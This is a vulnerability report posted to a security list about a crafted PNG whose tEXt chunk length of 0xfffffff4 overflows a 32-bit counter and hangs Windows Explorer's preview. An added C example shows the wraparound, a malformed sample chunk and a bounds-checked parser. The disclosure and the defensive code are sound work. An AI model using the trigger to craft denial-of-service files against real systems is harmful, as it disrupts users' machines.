Possible Windows Explorer bad PNG file preview integer overflow
Hi folks,
Can anyone confirm that the attached PNG file is causing Explorer to eat
100% CPU, and if this is a known issue?
(Currently tested with an up-to-date Windows XP and Windows Vista)
The probable cause is an integer overflow in the PNG chunk size handling,
which is 32 bits large, and which can cause a 32-bit counter to overflow
when specifically designed for (the attached file contains a tEXt chunk
which is 0xfffffff4 bytes large), leading to a bypass of size checking and
causing counters to go backward.
(Other applications handling PNG files might be affected)
Regards,
Xavier Roche
Attachment: badlycrafted.png
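The wraparound described in the message, as an added example that is not part of the original post and is not Explorer's code: in 32-bit arithmetic, a chunk length of 0xfffffff4 plus the 12 bytes of chunk framing (length, type, CRC) wraps to 0, while a walker that compares by subtraction and enforces the PNG specification's 2^31-1 length limit rejects the chunk. The byte arrays are constructed samples, and `naive_chunk_span` and `png_count_chunks` are hypothetical names.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PNG_MAX_CHUNK_LEN 0x7fffffffu /* PNG spec: chunk length <= 2^31-1 */
#define SIG 0x89, 'P', 'N', 'G', '\r', '\n', 0x1a, '\n'

/* Constructed samples (not the attachment from the post). */
static const uint8_t sample_ok[] = { SIG, 0, 0, 0, 0, 'I', 'E', 'N', 'D',
                                     0xae, 0x42, 0x60, 0x82 };
static const uint8_t sample_bad[] = { SIG, 0xff, 0xff, 0xff, 0xf4, 't', 'E',
                                      'X', 't', 'A', 'B', 'C', 'D', 0, 0, 0, 0 };

/* PNG stores chunk lengths as big-endian 32-bit values. */
static uint32_t be32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* Flawed pattern: bytes to skip (length + type + data + CRC) in 32 bits. */
static uint32_t naive_chunk_span(uint32_t data_len) {
    return data_len + 12u; /* 0xfffffff4 + 12 wraps to 0: no forward progress */
}

/* Walks chunk layout only (no CRC/IHDR checks); returns count, -1 if malformed. */
static int png_count_chunks(const uint8_t *buf, size_t size) {
    static const uint8_t sig[8] = { SIG };
    size_t pos = 8;
    int count = 0;
    if (size < 8 || memcmp(buf, sig, 8) != 0) return -1;
    while (pos < size) {
        size_t remaining = size - pos;
        if (remaining < 12) return -1;           /* no room for header + CRC */
        uint32_t len = be32(buf + pos);
        if (len > PNG_MAX_CHUNK_LEN) return -1;  /* rejects 0xfffffff4 */
        if (len > remaining - 12) return -1;     /* subtraction cannot wrap */
        const uint8_t *type = buf + pos + 4;
        pos += 12 + (size_t)len;
        count++;
        if (memcmp(type, "IEND", 4) == 0) break;
    }
    return count;
}

int main(void) {
    printf("naive=%u ok=%d bad=%d\n", (unsigned)naive_chunk_span(0xfffffff4u),
           png_count_chunks(sample_ok, sizeof sample_ok),
           png_count_chunks(sample_bad, sizeof sample_bad));
    return 0;
}
```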